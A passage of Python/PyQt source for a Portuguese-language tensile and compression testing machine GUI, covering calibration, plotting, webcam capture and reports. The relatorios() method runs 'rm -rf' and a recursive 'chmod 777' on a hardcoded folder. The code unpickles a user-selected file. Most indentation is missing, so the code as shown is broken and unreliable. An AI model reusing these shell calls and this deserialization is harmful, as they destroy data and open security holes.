pdf.drawImage(Image2 ,130,50, width=400,height=350)
pdf2.showPage()
pdf.showPage()
pdf2.save()
self.cancelartestes()
pdf.save()
x = [0]
y = [0]
def excluirlinha_grafic(self):
global testes
self.line1.set_data([],[])
self.combo2.removeItem(self.Index)
try:
self.idx = int(self.returnposteste(self.Index22))
except:
pass
try:
self.Linhas[self.idx].set_data([], [])
except:
pass
testes.pop(self.idx)
self.ax1f1.cla()
self.Linhas = []
for i in range(0,len(testes)):
self.u.append(testes[i]["nome"])
self.aux, = self.ax1f1.plot(list(testes[i]["x1"]),list(testes[i]["x2"]),label='${i}$'.format(i=str(testes[i]["nome"])))
self.Linhas.append(self.aux)
self.ax1f1.legend(loc ='best')
self.ax1f1.grid(True)
self.fig.canvas.draw_idle()
def Parando3(self,i = None):
global flag2
global flag
flag = 0
flag2 =0
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(False)
self.pushButton.setVisible(True)
self.pushButton_4.setVisible(False)
self.emergrafic.setVisible(False)
"""deslocamentos = [0]
forcas = [0]
self.Deslocamento_grafic.setValue(float(0.00))
self.Forca_grafic.setValue(float(0.00))
self.ax1f1.set_ylim(0, forcas[-1]+10)
self.ax1f1.set_xlim(0, deslocamentos[-1]+10)
self.line1.set_data(deslocamentos,forcas)
self.fig.canvas.draw()"""
Motor.Parar()
self.confirmar_continuacao()
def Parando2(self):
global flag2
flag2 =0
self.pushButton_2.setVisible(True)
self.pushButton_3.setVisible(True)
self.parar_ajuste.setVisible(True)
Motor.Parar()
def verificar_Browser_Ensaio(self):
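        # Tries to load the pickled 'save.txt' chosen via the file browser; on
        # failure it asks whether to pick another file or give up resuming the
        # previous lot. Returns 1 on success, 0 otherwise.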
try:
with open(str(self.filedir[0]),"rb") as fp:
testes = pickle.load(fp)
return 1
except:
self.ensaiologin = False
self.res= QtWidgets.QMessageBox()
self.res.setText("Aparentemente você selecionou o arquivo de Browser Ensaio incorretamente, você deve selecionar o arquivo save.txt, você deseja tentar novamente e tentar continuar um antigo teste?")
self.res.addButton(QtWidgets.QMessageBox.Yes)
self.res.addButton(QtWidgets.QMessageBox.No)
result1 = self.res.exec_()
if result1 == QtWidgets.QMessageBox.Yes:
self.func_browser()
return self.verificar_Browser_Ensaio()
if result1 == QtWidgets.QMessageBox.No:
return 0
def iniciar(self):
global deslocamentos
global forcas
global testes
global contando
self.inputl.hide()
self.input.hide()
self.botaobrowser.hide()
if(self.ensaiologin == True and self.ensaiologin != None ):
resul= self.verificar_Browser_Ensaio()
if resul == 1:
with open(str(self.filedir[0]),"rb") as fp:
testes = pickle.load(fp)
contando = len(testes)
self.ensaiologin = False
else:
self.ensaiologin = False
try:
arquivo = open("Fator_Calibracao.txt","r")
fator = arquivo.readline()
celula.iniciarcel(str(fator))
except:
print("O Arquivo Fator_Calibracao.txt, está corrompido ou foi excluido você não pode iniciar o ensaio sem este arquivo, solução: vá até a interface ,selecione a aba celula de carga e escolha novamente a celula de carga isso irá criar o arquivo novamente. \n",file=log_file)
sys.exit()
self.Config.setCurrentWidget(self.Grafic)
deslocamentos = [0]
forcas = [0]
self.Linhas = []
self.pushButton_2.setVisible(False)
self.pushButton_3.setVisible(False)
self.parar_ajuste.setVisible(False)
self.pushButton.setVisible(False)
self.pushButton_4.setVisible(True)
self.emergrafic.setVisible(True)
global flag2
global qforca
global maxforca
global maxdeslocamento
global tempinicioteste
global VelocidadeEn
global tipodeensaio
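        # Test direction: checkBox selects tração (crosshead moves up) versus
        # compressão (moves down); Subir_descer() apparently takes
        # (speed, direction, travel).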
if(self.checkBox.isChecked() == True):
#Motor.subir()
Motor.Subir_descer(self.Velocidade.value(),1,0)
tipodeensaio = "Tração"
else:
Motor.Subir_descer(self.Velocidade.value(),0,0)
tipodeensaio = "Compressão"
#Motor.baixar()
VelocidadeEn = self.Velocidade.value()
#Motor.calcular( float(VelocidadeEn) )
tempinicioteste = time.time()
if(self.checkBox_3.checkState() == 2):
qforca = self.Velocidade_2.value()
else:
qforca = None
if(self.checkBox_4.checkState() == 2):
max_forca= self.Velocidade_3.value()
else:
max_forca = None
if (self.checkBox_5.checkState() == 2):
maxdeslocamento= self.Velocidade_4.value()
else:
maxdeslocamento= None
if(self.checkBox_6.isChecked() == True):
a = self.a_retangulo.value()
b = self.b_retangulo.value()
else:
a =None
b = None
if(self.checkBox_7.isChecked() == True):
c = self.Velocidade_8.value()
d = self.d_retangulo.value()
else:
c =None
d = None
if(self.checkBox_8.isChecked() == True):
e = self.D_cilimdro.value()
f = self.H_cilindro.value()
else:
e =None
f = None
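        # Cross-section of the specimen: rectangle (a x b), tube (c, d) or
        # cylinder (diameter e, height f). Area(), defined elsewhere in this
        # module, appears to compute and store the area used in the PDF report.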
Area(a,b,c,d,e,f)
flag2 =1
self.thread3.start()
self.thread3.UPsig.connect(self.update1)
self.thread3.Stopsig.connect(self.Parando3)
#QtWidgets.QWidget.connect(self.thread3, QtCore.SIGNAL("UP"), self.update1)
#QtWidgets.QWidget.connect(self.thread3, QtCore.SIGNAL("Parando"), self.Parando3)
def update1(self,lista):
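        # Slot for the acquisition thread's UPsig signal. 'lista' carries
        # [displacement mm, force (apparently in kg), y-axis max, x-axis max,
        # x data, y data]; the force is converted to newtons (x 9.8) for display.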
self.Deslocamento_grafic.setValue(lista[0])
self.Forca_grafic.setValue(float(lista[1])*9.8)
self.ax1f1.set_ylim(0, lista[2])
self.ax1f1.set_xlim(0, lista[3])
self.line1.set_data(lista[4],lista[5])
self.fig.canvas.draw_idle()
def calibrar(self):
celula.tare()
self.bcal2.hide()
self.obs3.hide()
self.pcal = QtWidgets.QDoubleSpinBox(self.Calibra)
self.obs3 = QtWidgets.QLabel(self.Calibra)
self.obs4 = QtWidgets.QLabel(self.Calibra)
self.qline = QtWidgets.QLineEdit(self.Calibra)
self.bcal2 = QtWidgets.QPushButton(self.Calibra)
self.bcal.hide()
self.ecal.hide()
self.pcal.setGeometry(QtCore.QRect(210,240,81,29))
self.pcal.setObjectName(_fromUtf8("pcal"))
self.pcal.setRange(0,3000.00)
self.pcal.setValue(1.00)
self.pcal.show()
self.obs3.setGeometry(QtCore.QRect(20,190,741,41))
self.obs3.setObjectName(_fromUtf8("obs"))
self.obs3.setText(_translate("MainWindow", "Informe o Valor do Peso Padrão (EM KG), após coloque o mesmo na celula de Carga , de um nome para a nova celula e Clique em continuar.",None))
self.obs3.show()
self.qline.setGeometry(QtCore.QRect(180,300,151,21))
self.qline.show()
self.obs4.setGeometry(QtCore.QRect(180,280,151,21))
self.obs4.setObjectName(_fromUtf8("obs"))
self.obs4.setText(_translate("MainWindow", "Nome da Celula:",None))
self.obs4.show()
self.bcal2.setGeometry(QtCore.QRect(190,340,151,21))
self.bcal2.setObjectName(_fromUtf8("bcal"))
self.bcal2.setText(_translate("MainWindow", "Continuar",None))
self.bcal2.show()
self.bcal2.clicked.connect(self.Ccalibrar)
def Ccalibrar(self):
self.bcal.hide()
self.ecal.hide()
self.obs3.setText(_translate("MainWindow", "Calibrando Celula de Carga Aguarde ! ",None))
VALUE_SERIAL=celula.calibrar()
B = self.pcal.value()
Fator= (float(VALUE_SERIAL)/float(B))
A = self.qline.text()
self.CALIBRA = open("conf_celulas.txt","r")
self.A = self.CALIBRA.readlines()
self.CALIBRA.close()
self.t= ''
self.C = []
self.posicao = 0
for i, valor in enumerate(self.A):
self.p = 0
self.j =0
while(self.p == 0):
if(self.A[i][self.j] != ';'):
self.t= self.t + self.A[i][self.j]
self.j += 1
else:
self.p =1
self.C.append(self.t.replace("\n",""))
self.t =''
if(self.t.replace("\n","") == A):
self.posicao = i
if(A != self.C[self.posicao]):
CALIBRA = open("conf_celulas.txt","a")
CALIBRA.write(str(A)+";")
CALIBRA.write(str(Fator)+"\n")
CALIBRA.close()
self.bcal2.hide()
self.obs3.setText(_translate("MainWindow", "Celula de Carga calibrada agora você já pode Colocar novamente as Garras/Mordentes\n Celula:"+str(A),None))
self.obs4.hide()
self.obs3.hide()
self.pcal.hide()
self.qline.hide()
self.bcal2.hide()
self.bcal.show()
self.ecal.show()
self.bcal2.hide()
else:
self.bcal2.hide()
self.obs3.setText(_translate("MainWindow", "Não foi Adicionado a Nova Celula, pois a celula com o nome:"+str(A)+"já existe vá em editar para recalibra-la",None))
self.obs4.hide()
self.pcal.hide()
self.qline.hide()
self.bcal2.hide()
self.bcal.show()
self.ecal.show()
self.bcal2.hide()
def updateCelulaInterface(self):
try:
CALIBRA = open("conf_celulas.txt","r")
except:
print("O Arquivo conf_celulas.txt, está corrompido ou foi excluido você não pode iniciar o ensaio sem este arquivo, solução: Adicione uma versao antiga do arquivo, se não tiver crie o arquivo e adicione a seguinte linha: celulatest;100000 \n Após você deve ir na aba celula de carga no software e adicionar novamente suas celulas de cargas pois os cadastros anteriores foram perdidas\n",file=log_file)
sys.exit()
try:
arquivo = open("Fator_Calibracao.txt","r")
fator = arquivo.readline()
except:
print("O Arquivo Fator_Calibracao.txt, está corrompido ou foi excluido você não pode iniciar o ensaio sem este arquivo, solução: vá até a interface ,selecione a aba celula de carga e escolha novamente a celula de carga isso irá criar o arquivo novamente. \n",file=log_file)
sys.exit()
A =CALIBRA.readlines()
CALIBRA.close()
t= ''
C = []
posicao = 0
for i, valor in enumerate(A):
for j, text in enumerate(valor):
if(text == ';'):
posicao = j+1
if(valor[posicao::] == fator):
posicao = posicao-1
self.input2.setText(_translate("MainWindow", "Celula de Carga: "+str(valor[:posicao]) ,None))
self.input2.show()
arquivo.close()
CALIBRA.close()
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(924, 599)
MainWindow.setMinimumSize(924, 599)
MainWindow.setMaximumSize(924, 599)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.Config = QtWidgets.QTabWidget(self.centralwidget)
self.Config.setGeometry(QtCore.QRect(0, 0, 961, 581))
self.Config.setObjectName(_fromUtf8("Config"))
self.Config_2 = QtWidgets.QWidget()
self.Config_2.setObjectName(_fromUtf8("Config_2"))
self.input = QtWidgets.QLineEdit(self.Config_2)
self.input.setGeometry(QtCore.QRect(600, 20, 151, 21))
self.input.setObjectName(_fromUtf8("input"))
self.inputl = QtWidgets.QLabel(self.Config_2)
self.inputl.setGeometry(QtCore.QRect(500, 20, 100, 21))
self.inputl.setObjectName(_fromUtf8("inputl"))
self.inputl.setText(_translate("MainWindow", "Nome do Lote:",None))
self.inputl.show()
self.input2 = QtWidgets.QLabel(self.Config_2)
self.input2.setGeometry(QtCore.QRect(500, 50,210,21))
self.input2.setObjectName(_fromUtf8("inputl"))
#self.input2.setText(_translate("MainWindow", "Celula de Carga:",None))
self.updateCelulaInterface()
#self.input2.show()
self.pushButton = QtWidgets.QPushButton(self.Config_2)
self.pushButton.setGeometry(QtCore.QRect(40, 20, 151, 21))
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.button_webcam = QtWidgets.QPushButton(self.Config_2)
self.button_webcam.setGeometry(QtCore.QRect(250, 20, 151, 21))
self.button_webcam.setObjectName(_fromUtf8("button_webcam"))
self.combo_webcam = QtWidgets.QComboBox(self.Config_2)
self.combo_webcam.setGeometry(QtCore.QRect(250, 60, 151, 21))
self.combo_webcam.setObjectName(_fromUtf8("combo_webcam"))
self.combo_webcam.show()
clist = webc.cameralist()
clist = clist[::-1]
self.combo_webcam.addItems(clist)
self.t_ensaio = QtWidgets.QFrame(self.Config_2)
self.t_ensaio.setGeometry(QtCore.QRect(50, 90, 201, 201))
self.t_ensaio.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.t_ensaio.setFrameShadow(QtWidgets.QFrame.Raised)
self.t_ensaio.setObjectName(_fromUtf8("t_ensaio"))
self.label = QtWidgets.QLabel(self.t_ensaio)
self.label.setGeometry(QtCore.QRect(50, 0, 101, 17))
self.label.setObjectName(_fromUtf8("label"))
self.checkBox = QtWidgets.QRadioButton(self.t_ensaio)
self.checkBox.setGeometry(QtCore.QRect(20, 50, 151, 22))
self.checkBox.setObjectName(_fromUtf8("checkBox"))
self.checkBox_2 = QtWidgets.QRadioButton(self.t_ensaio)
self.checkBox_2.setGeometry(QtCore.QRect(20, 90, 161, 22))
self.checkBox_2.setObjectName(_fromUtf8("checkBox_2"))
self.Velocidade = QtWidgets.QDoubleSpinBox(self.t_ensaio)
self.Velocidade.setGeometry(QtCore.QRect(27, 160,81, 29))
self.Velocidade.setObjectName(_fromUtf8("Velocidade"))
self.Velocidade.setRange(8, 175 )
self.Velocidade.setValue(10)
self.label_2 = QtWidgets.QLabel(self.t_ensaio)
self.label_2.setGeometry(QtCore.QRect(40, 130, 141, 17))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_3 = QtWidgets.QLabel(self.t_ensaio)
self.label_3.setGeometry(QtCore.QRect(120, 170, 57, 20))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.frame_2 = QtWidgets.QFrame(self.Config_2)
self.frame_2.setGeometry(QtCore.QRect(270, 90, 361, 201))
self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_2.setObjectName(_fromUtf8("frame_2"))
self.checkBox_3 = QtWidgets.QCheckBox(self.frame_2)
self.checkBox_3.setGeometry(QtCore.QRect(30, 50, 161, 22))
self.checkBox_3.setObjectName(_fromUtf8("checkBox_3"))
self.label_4 = QtWidgets.QLabel(self.frame_2)
self.label_4.setGeometry(QtCore.QRect(120, 0, 111, 17))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.Velocidade_2 = QtWidgets.QDoubleSpinBox(self.frame_2)
self.Velocidade_2.setGeometry(QtCore.QRect(200, 50, 81, 21))
self.Velocidade_2.setObjectName(_fromUtf8("Velocidade_2"))
self.Velocidade_2.setRange(0,99.00)
self.Velocidade_2.setValue(99.00)
self.label_5 = QtWidgets.QLabel(self.frame_2)
self.label_5.setGeometry(QtCore.QRect(210, 40, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.checkBox_4 = QtWidgets.QCheckBox(self.frame_2)
self.checkBox_4.setGeometry(QtCore.QRect(30, 100, 161, 22))
self.checkBox_4.setObjectName(_fromUtf8("checkBox_4"))
self.Velocidade_3 = QtWidgets.QDoubleSpinBox(self.frame_2)
self.Velocidade_3.setGeometry(QtCore.QRect(200, 100, 81, 21))
self.Velocidade_3.setObjectName(_fromUtf8("Velocidade_3"))
self.Velocidade_3.setRange(0,10000.00)
self.label_6 = QtWidgets.QLabel(self.frame_2)
self.label_6.setGeometry(QtCore.QRect(210, 80, 71, 20))
font = QtGui.QFont()
font.setPointSize(8)
self.label_6.setFont(font)
self.label_6.setObjectName(_fromUtf8("label_6"))
self.checkBox_5 = QtWidgets.QCheckBox(self.frame_2)
self.checkBox_5.setGeometry(QtCore.QRect(30, 150, 161, 22))
self.checkBox_5.setObjectName(_fromUtf8("checkBox_5"))
self.Velocidade_4 = QtWidgets.QDoubleSpinBox(self.frame_2)
self.Velocidade_4.setGeometry(QtCore.QRect(200, 150, 81, 21))
self.Velocidade_4.setObjectName(_fromUtf8("Velocidade_4"))
self.Velocidade_4.setRange(0,5000.00)
self.label_7 = QtWidgets.QLabel(self.frame_2)
self.label_7.setGeometry(QtCore.QRect(190, 130, 111, 20))
font = QtGui.QFont()
font.setPointSize(8)
self.label_7.setFont(font)
self.label_7.setObjectName(_fromUtf8("label_7"))
self.label_8 = QtWidgets.QLabel(self.frame_2)
self.label_8.setGeometry(QtCore.QRect(280, 100, 57, 20))
self.label_8.setObjectName(_fromUtf8("label_8"))
self.label_9 = QtWidgets.QLabel(self.frame_2)
self.label_9.setGeometry(QtCore.QRect(280, 160, 57, 20))
self.label_9.setObjectName(_fromUtf8("label_9"))
self.t_ensaio_2 = QtWidgets.QFrame(self.Config_2)
self.t_ensaio_2.setGeometry(QtCore.QRect(660, 90, 201, 201))
self.t_ensaio_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.t_ensaio_2.setFrameShadow(QtWidgets.QFrame.Raised)
self.t_ensaio_2.setObjectName(_fromUtf8("t_ensaio_2"))
self.label_10 = QtWidgets.QLabel(self.t_ensaio_2)
self.label_10.setGeometry(QtCore.QRect(40, 0, 101, 17))
self.label_10.setObjectName(_fromUtf8("label_10"))
self.desl = QtWidgets.QLabel(self.t_ensaio_2)
self.desl.setGeometry(QtCore.QRect(20, 20, 141, 17))
self.desl.setObjectName(_fromUtf8("desl"))
self.deslb = QtWidgets.QDoubleSpinBox(self.t_ensaio_2)
self.deslb.setGeometry(QtCore.QRect(27, 40, 81, 29))
self.deslb.setObjectName(_fromUtf8("Vel_ajuste"))
self.deslb.setRange(8, 175)
self.deslb.setValue(30)
self.deslm = QtWidgets.QLabel(self.t_ensaio_2)
self.deslm.setGeometry(QtCore.QRect(110, 50, 57, 20))
self.deslm.setObjectName(_fromUtf8("label_12"))
self.Vel_ajuste = QtWidgets.QDoubleSpinBox(self.t_ensaio_2)
self.Vel_ajuste.setGeometry(QtCore.QRect(27, 90, 81, 29))
self.Vel_ajuste.setObjectName(_fromUtf8("Vel_ajuste"))
self.Vel_ajuste.setRange(8, 175)
self.Vel_ajuste.setValue(120)
self.label_11 = QtWidgets.QLabel(self.t_ensaio_2)
self.label_11.setGeometry(QtCore.QRect(20, 70, 141, 17))
self.label_11.setObjectName(_fromUtf8("label_11"))
self.label_12 = QtWidgets.QLabel(self.t_ensaio_2)
self.label_12.setGeometry(QtCore.QRect(110, 90, 57, 20))
self.label_12.setObjectName(_fromUtf8("label_12"))
self.pushButton_2 = QtWidgets.QPushButton(self.t_ensaio_2)
self.pushButton_2.setGeometry(QtCore.QRect(110, 140, 51, 31))
self.pushButton_2.setObjectName(_fromUtf8("pushButton_2"))
self.botaodiretorio = QtWidgets.QPushButton(self.Config_2)
self.botaodiretorio.setGeometry(QtCore.QRect(800, 50, 100, 21))
self.botaodiretorio.setObjectName(_fromUtf8("pushButton_2"))
self.botaobrowser = QtWidgets.QPushButton(self.Config_2)
self.botaobrowser.setGeometry(QtCore.QRect(800, 20, 120, 21))
self.botaobrowser.setObjectName(_fromUtf8("pushButton_2"))
self.pushButton_3 = QtWidgets.QPushButton(self.t_ensaio_2)
self.pushButton_3.setGeometry(QtCore.QRect(40, 140, 41, 31))
self.pushButton_3.setObjectName(_fromUtf8("pushButton_3"))
self.parar_ajuste = QtWidgets.QPushButton(self.t_ensaio_2)
self.parar_ajuste.setGeometry(QtCore.QRect(60, 175, 80, 21))
self.parar_ajuste.setObjectName(_fromUtf8("parar_ajuste"))
self.raio_tubo = QtWidgets.QFrame(self.Config_2)
self.raio_tubo.setGeometry(QtCore.QRect(210, 320, 521, 191))
self.raio_tubo.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.raio_tubo.setFrameShadow(QtWidgets.QFrame.Raised)
self.raio_tubo.setObjectName(_fromUtf8("raio_tubo"))
self.label_13 = QtWidgets.QLabel(self.raio_tubo)
self.label_13.setGeometry(QtCore.QRect(140, 0, 271, 17))
self.label_13.setObjectName(_fromUtf8("label_13"))
self.checkBox_6 = QtWidgets.QRadioButton(self.raio_tubo)
self.checkBox_6.setGeometry(QtCore.QRect(40, 30, 111, 22))
self.checkBox_6.setObjectName(_fromUtf8("checkBox_6"))
self.checkBox_7 = QtWidgets.QRadioButton(self.raio_tubo)
self.checkBox_7.setGeometry(QtCore.QRect(40, 80, 101, 22))
self.checkBox_7.setObjectName(_fromUtf8("checkBox_7"))
self.checkBox_8 = QtWidgets.QRadioButton(self.raio_tubo)
self.checkBox_8.setGeometry(QtCore.QRect(40, 130, 101, 22))
self.checkBox_8.setObjectName(_fromUtf8("checkBox_8"))
self.a_retangulo = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.a_retangulo.setGeometry(QtCore.QRect(180, 30, 81, 21))
self.a_retangulo.setObjectName(_fromUtf8("a_retangulo"))
self.a_retangulo.setRange(0,1000.00)
self.b_retangulo = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.b_retangulo.setGeometry(QtCore.QRect(260, 30, 81, 21))
self.b_retangulo.setObjectName(_fromUtf8("b_retangulo"))
self.b_retangulo.setRange(0,1000.00)
self.retanguloima = QtWidgets.QLabel(self.raio_tubo)
        #,x position (left to right), y position (increases downwards), width, height
self.retanguloima.setGeometry(QtCore.QRect(350, 10, 120, 60))
self.retanguloima.setObjectName(_fromUtf8("retangulo"))
self.pixmap1 = QtGui.QPixmap('Imagens/retangulo1.png')
self.pixmap1= self.pixmap1.scaledToWidth(60)
#self.pixmap1= self.pixmap1.scaledToHeight(150)
self.retanguloima.setPixmap(self.pixmap1)
self.tuboima = QtWidgets.QLabel(self.raio_tubo)
        #,x position (left to right), y position (increases downwards), width, height
self.tuboima.setGeometry(QtCore.QRect(350, 37, 120, 100))
self.tuboima.setObjectName(_fromUtf8("tubo"))
self.pixmap2 = QtGui.QPixmap('Imagens/tubo1.png')
self.pixmap2= self.pixmap2.scaledToWidth(80)
#self.pixmap1= self.pixmap1.scaledToHeight(150)
self.tuboima.setPixmap(self.pixmap2)
self.ciliima = QtWidgets.QLabel(self.raio_tubo)
        #,x position (left to right), y position (increases downwards), width, height
self.ciliima.setGeometry(QtCore.QRect(400, 100, 120, 100))
self.ciliima.setObjectName(_fromUtf8("tubo"))
self.pixmap3 = QtGui.QPixmap('Imagens/cilindro.png')
self.pixmap3= self.pixmap3.scaledToWidth(70)
#self.pixmap1= self.pixmap1.scaledToHeight(150)
self.ciliima.setPixmap(self.pixmap3)
self.label_15 = QtWidgets.QLabel(self.raio_tubo)
self.label_15.setGeometry(QtCore.QRect(190, 15, 61, 21))
font = QtGui.QFont()
font.setPointSize(8)
self.label_15.setFont(font)
self.label_15.setObjectName(_fromUtf8("label_15"))
self.label_16 = QtWidgets.QLabel(self.raio_tubo)
self.label_16.setGeometry(QtCore.QRect(280, 10, 61, 31))
font = QtGui.QFont()
font.setPointSize(8)
self.label_16.setFont(font)
self.label_16.setObjectName(_fromUtf8("label_16"))
self.Velocidade_8 = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.Velocidade_8.setGeometry(QtCore.QRect(180, 80, 81, 21))
self.Velocidade_8.setObjectName(_fromUtf8("Velocidade_8"))
self.Velocidade_8.setRange(0,1000.00)
self.d_retangulo = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.d_retangulo.setGeometry(QtCore.QRect(260, 80, 81, 21))
self.d_retangulo.setObjectName(_fromUtf8("d_retangulo"))
self.d_retangulo.setRange(0,1000.00)
self.label_17 = QtWidgets.QLabel(self.raio_tubo)
self.label_17.setGeometry(QtCore.QRect(190, 66, 61, 20))
font = QtGui.QFont()
font.setPointSize(8)
self.label_17.setFont(font)
self.label_17.setObjectName(_fromUtf8("label_17"))
self.label_18 = QtWidgets.QLabel(self.raio_tubo)
self.label_18.setGeometry(QtCore.QRect(280, 70, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_18.setFont(font)
self.label_18.setObjectName(_fromUtf8("label_18"))
self.D_cilimdro = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.D_cilimdro.setGeometry(QtCore.QRect(180, 130, 81, 21))
self.D_cilimdro.setObjectName(_fromUtf8("D_cilimdro"))
self.D_cilimdro.setRange(0,1000.00)
self.H_cilindro = QtWidgets.QDoubleSpinBox(self.raio_tubo)
self.H_cilindro.setGeometry(QtCore.QRect(260, 130, 81, 21))
self.H_cilindro.setObjectName(_fromUtf8("H_cilindro"))
self.H_cilindro.setRange(0,1000.00)
self.label_19 = QtWidgets.QLabel(self.raio_tubo)
self.label_19.setGeometry(QtCore.QRect(190, 120, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_19.setFont(font)
self.label_19.setObjectName(_fromUtf8("label_19"))
self.label_20 = QtWidgets.QLabel(self.raio_tubo)
self.label_20.setGeometry(QtCore.QRect(280, 120, 61, 16))
font = QtGui.QFont()
font.setPointSize(8)
self.label_20.setFont(font)
self.label_20.setObjectName(_fromUtf8("label_20"))
self.pushButton_4 = QtWidgets.QPushButton(self.Config_2)
self.pushButton_4.setGeometry(QtCore.QRect(240, 20, 101, 21))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButton_4.sizePolicy().hasHeightForWidth())
self.pushButton_4.setSizePolicy(sizePolicy)
self.pushButton_4.setObjectName(_fromUtf8("pushButton_4"))
self.emergrafic = QtWidgets.QPushButton(self.Grafic)
self.emergrafic.setGeometry(QtCore.QRect(750, 20, 101, 21))
self.emergrafic.setSizePolicy(sizePolicy)
self.emergrafic.setObjectName(_fromUtf8("pushButton_4"))
self.Config.addTab(self.Config_2, _fromUtf8(""))
self.Deslocamento_grafic = QtWidgets.QDoubleSpinBox(self.Grafic)
self.Deslocamento_grafic.setGeometry(QtCore.QRect(170, 90, 131, 31))
self.Deslocamento_grafic.setObjectName(_fromUtf8("Deslocamento_grafic"))
self.Deslocamento_grafic.setRange(0,900)
self.Forca_grafic = QtWidgets.QDoubleSpinBox(self.Grafic)
self.Forca_grafic.setGeometry(QtCore.QRect(540, 90, 121, 31))
self.Forca_grafic.setObjectName(_fromUtf8("Forca_grafic"))
self.Forca_grafic.setRange(0,10000)
self.label_21 = QtWidgets.QLabel(self.Grafic)
self.label_21.setGeometry(QtCore.QRect(180, 70, 111, 17))
self.label_21.setObjectName(_fromUtf8("label_21"))
self.label_22 = QtWidgets.QLabel(self.Grafic)
self.label_22.setGeometry(QtCore.QRect(570, 70, 111, 17))
self.label_22.setObjectName(_fromUtf8("label_22"))
self.label_23 = QtWidgets.QLabel(self.Grafic)
self.label_23.setGeometry(QtCore.QRect(310, 100, 111, 17))
self.label_23.setObjectName(_fromUtf8("label_23"))
self.label_24 = QtWidgets.QLabel(self.Grafic)
self.label_24.setGeometry(QtCore.QRect(670, 100, 111, 20))
self.label_24.setObjectName(_fromUtf8("label_24"))
self.pushButton_5 = QtWidgets.QPushButton(self.Grafic)
self.pushButton_5.setGeometry(QtCore.QRect(110, 20, 110, 29))
self.pushButton_5.setObjectName(_fromUtf8("pushButton_5"))
self.pushButton_6 = QtWidgets.QPushButton(self.Grafic)
self.pushButton_6.setGeometry(QtCore.QRect(560, 20,131 , 29))
self.pushButton_6.setObjectName(_fromUtf8("pushButton_6"))
self.pushButton_7 = QtWidgets.QPushButton(self.Grafic)
self.pushButton_7.setGeometry(QtCore.QRect(320, 20, 131, 29))
self.pushButton_7.setObjectName(_fromUtf8("pushButton_7"))
self.Config.addTab(self.Grafic, _fromUtf8(""))
MainWindow.setCentralWidget(self.centralwidget)
self.fig_dict = {}
        # Load cell ("Celula de Carga") tab definition
self.Calibra = QtWidgets.QWidget()
self.Calibra.setObjectName(_fromUtf8("Celula de Carga"))
self.obs = QtWidgets.QLabel(self.Calibra)
self.obs.setGeometry(QtCore.QRect(20,50,841,21))
self.obs.setObjectName(_fromUtf8("obs"))
self.bcal = QtWidgets.QPushButton(self.Calibra)
self.bcal.setGeometry(QtCore.QRect(150,110,131,29))
self.bcal.setObjectName(_fromUtf8("bcal"))
self.obs3 = QtWidgets.QLabel(self.Calibra)
self.ecal = QtWidgets.QPushButton(self.Calibra)
self.ecal.setGeometry(QtCore.QRect(530,110,151,29))
self.ecal.setObjectName(_fromUtf8("ecal"))
self.scal = QtWidgets.QPushButton(self.Calibra)
self.scal.setGeometry(QtCore.QRect(330,110,161,29))
self.scal.setObjectName(_fromUtf8("scal"))
self.combo = QtWidgets.QComboBox(self.Calibra)
self.Config.addTab(self.Calibra, _fromUtf8(""))
self.combo2 = QtWidgets.QComboBox(self.Grafic)
self.bcombo = QtWidgets.QPushButton(self.Grafic)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 924, 23))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.Config.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.obs.hide()
self.combo.hide()
self.combo2.hide()
self.scal.hide()
self.bcombo.hide()
def func_browser(self):
file = QtWidgets.QFileDialog()
self.filedir = file.getOpenFileName()
#print (self.filedir)
self.ensaiologin = True
def relatorios(self):
os.system('rm -rf /home/laboratorio/Desktop/Ensaios')
os.system('cp -R /opt/MET-Master/Ensaios/ /home/laboratorio/Desktop/Ensaios/')
os.system('chmod 777 /home/laboratorio/Desktop/Ensaios/ -R')
os.system("nautilus /home/laboratorio/Desktop/Ensaios/")
#os.system("exo-open --launch FileManager Ensaios/")
def webcamcapture_final(self):
global contando
escolhido = self.combo.currentText()
self.combo.clear()
cameras = webc.cameralist()
cameras = cameras[::-1]
self.combo.addItems(cameras)
#print(self.combo.currentText(),cameras[0])
imagesavedir = 'TempImagens/'+self.input.text()+str(contando)+'-final.png'
ind=0
for i in range(len(cameras)):
if str(cameras[i]) == escolhido:
ind = i
webc.main(imagesavedir,cameras[ind])
def webcamcapture(self):
global contando
escolhido = self.combo.currentText()
self.combo.clear()
cameras = webc.cameralist()
cameras = cameras[::-1]
self.combo.addItems(cameras)
#print(self.combo.currentText(),cameras[0])
imagesavedir = 'TempImagens/'+self.input.text()+str(contando)+'-inicial.png'
ind=0
for i in range(len(cameras)):
if str(cameras[i]) == escolhido:
ind = i
